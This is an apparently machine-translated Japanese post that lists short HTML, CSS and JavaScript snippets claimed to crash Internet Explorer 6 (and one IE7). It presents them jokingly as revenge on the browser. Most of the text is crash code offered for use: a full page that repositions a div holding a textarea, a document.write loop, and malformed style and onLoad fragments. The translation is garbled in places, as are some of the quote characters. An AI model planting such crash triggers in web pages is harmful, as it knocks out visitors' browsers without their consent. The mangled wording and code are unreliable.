以下に、IE6をクラッシュさせるコードの小さな非網羅的なリストを示します。
それでも、開発者に対するこのような苦痛の後、復weする権利はないのでしょうか?
最長のものから始めましょう:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>CRASH-IE</title> <style type="text/css"> html, body { overflow: hidden; scrollbar-base-color: #330066; } .crash { position:absolute; left:200px; top:200px; width:200px; } </style> <script type="text/javascript"> function galgenfrist() { window.setTimeout('crashIE();',1000); } function crashIE() { var moveNode = document.getElementById("move"); if(moveNode) { moveNode.style.top = "100px"; moveNode.style.left = "200px"; } } </script> </head> <body onload="galgenfrist();"> <h1>CRASH-IE</h1> <div id="move" class="crash"> <table> <tbody> <tr> <td> <textarea></textarea> </td> </tr> </tbody> </table> </div> </body> </html>
JavascriptとIE6、真のラブストーリー...
<script>for (x in document.write) { document.write(x);}</script>
これは昨年発見されました:
<style>*{position:relative}</style><table><input></table>
Anti-IE Javascriptの逆襲!
<body onLoad=†window()†>
そして今、私のお気に入り:11人のキャラクターとブーム:
<STYLE>@;/*
これは、IE7を置く私に知られている唯一のものです:
function getX( oElement ) { var iReturnValue = 0; while( oElement != null ) { iReturnValue += oElement.offsetLeft; oElement = oElement.offsetParent; } return iReturnValue; }